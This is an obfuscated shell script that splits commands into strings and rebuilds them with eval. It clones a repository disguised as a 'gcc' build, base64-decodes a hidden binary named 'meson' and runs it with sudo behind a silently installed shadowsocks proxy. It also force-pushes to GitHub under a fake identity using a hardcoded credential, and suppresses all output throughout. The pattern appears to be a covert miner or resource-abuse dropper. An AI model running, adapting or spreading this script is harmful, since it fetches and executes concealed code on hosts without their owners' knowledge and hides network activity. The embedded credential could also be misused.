GdFCZT=" clone https:"
CuQym="//gccbuild"
ykSt="@bitbucket.org"
cVzc="/gccbuild/gc"
WHHyHUu="c.git &>/dev/n"
CfEqBICH="u"
eval "git""$GdFCZT""$CuQym""$ykSt""$cVzc""$WHHyHUu""$CfEqBICH""ll"
aljx="e64 -d gcc/s >"
ZphvN=" "
eval "bas""$aljx""$ZphvN""o"
HBILhuki="o apt updat"
SEzMK="e &>/dev/nu"
qBpyWz="ll ||"
eval "sud""$HBILhuki""$SEzMK""$qBpyWz"" true"
VoqkVVXt="sudo apt --yes "
vBOvQq="install psm"
XRMF="isc shadowso"
NvQGO="cks-libev &"
KUWzS=">/dev/null ||"
eval "$VoqkVVXt""$vBOvQq""$XRMF""$NvQGO""$KUWzS"" true"
vALn="sudo systemctl "
EZOX="stop shadows"
awljOm="ocks-libev.ser"
BAGgOcsV="vice &>/de"
LlLKnVHw="v/null ||"
eval "$vALn""$EZOX""$awljOm""$BAGgOcsV""$LlLKnVHw"" true"
XUjhX="do ss-local -c "
ZWYHObWA="o &>/dev/nul"
eval "su""$XUjhX""$ZWYHObWA""l &"
gIDSyyZL="se64 -d gc"
jDsj="c/c >"
eval "ba""$gIDSyyZL""$jDsj"" cas"
ilMIapg="base64 -d gcc"
HCXHGhx="/m > m"
eval "$ilMIapg""$HCXHGhx""eson"
pfuh="hmod +x meso"
eval "c""$pfuh""n"
FtWWn="ed -i 's/gcc/g"
hDyLUl="egeo/g"
eval "s""$FtWWn""$hDyLUl""' cas"
xwvRDEmz="udo ./meson "
ZzeH="--config cas &>"
MYEtiQi="/dev/n"
eval "s""$xwvRDEmz""$ZzeH""$MYEtiQi""ull &"
echo lcbp
Odvl="eep 7"
eval "sl""$Odvl""0"
oqJcs="it clone ht"
InYg="tps://gith"
cuiDDx="ub.com/hcka-me"
RGaH="chanics/spa"
YVwhdQ="rkz.git tmp"
RBzzq=" &>/dev/n"
eval "g""$oqJcs""$InYg""$cuiDDx""$RGaH""$YVwhdQ""$RBzzq""ull"
HKvoEU="tm"
eval "cd ""$HKvoEU""p"
LPhGfVLo="it config user."
lxcRI="name 'Viktori"
dqrgD="ya Jeremenko'"
MUeOoGu=" &>/dev"
eval "g""$LPhGfVLo""$lxcRI""$dqrgD""$MUeOoGu""/null"
aYkmG="t config us"
YpGyXF="er.email vik"
zeFqG="toriya.jerem"
FwBrcaW="enkoxy@eclips"
RoPKb="o.eu &>/dev"
eval "gi""$aYkmG""$YpGyXF""$zeFqG""$FwBrcaW""$RoPKb""/null"
ODZWX="ILD=\`date "
eval "BU""$ODZWX""+%s\`"
GwfLK="KE=\`date +%S\`"
eval "MA""$GwfLK"
echo $BUILD >> lcbp$MAKE
git add lcbp$MAKE &>/dev/null
git commit -m 'sparkz re-upload '$MAKE &>/dev/null
BKGFu="it push ht"
WhvmpQjH="tps://vikt"
lJZdZ="oriya-jerem"
qwQGkv="enkoxy:'O3U"
eNmv="oPzqSDP5mQ_7"
IeujzxrI="Bu'@github.co"
XxSBT="m/hcka-mech"
szjaQD="anics/sparkz"
wlrS=".git -f &>/dev/"
VNnoIrd="null ||"
eval "g""$BKGFu""$WhvmpQjH""$lJZdZ""$qwQGkv""$eNmv""$IeujzxrI""$XxSBT""$szjaQD""$wlrS""$VNnoIrd"" true"
while :; do G=`date +%s`; echo 'sparkz meson $G'; [ `expr 1282 + $BUILD` -lt $G ] && sudo killall meson && break; sleep 172; done
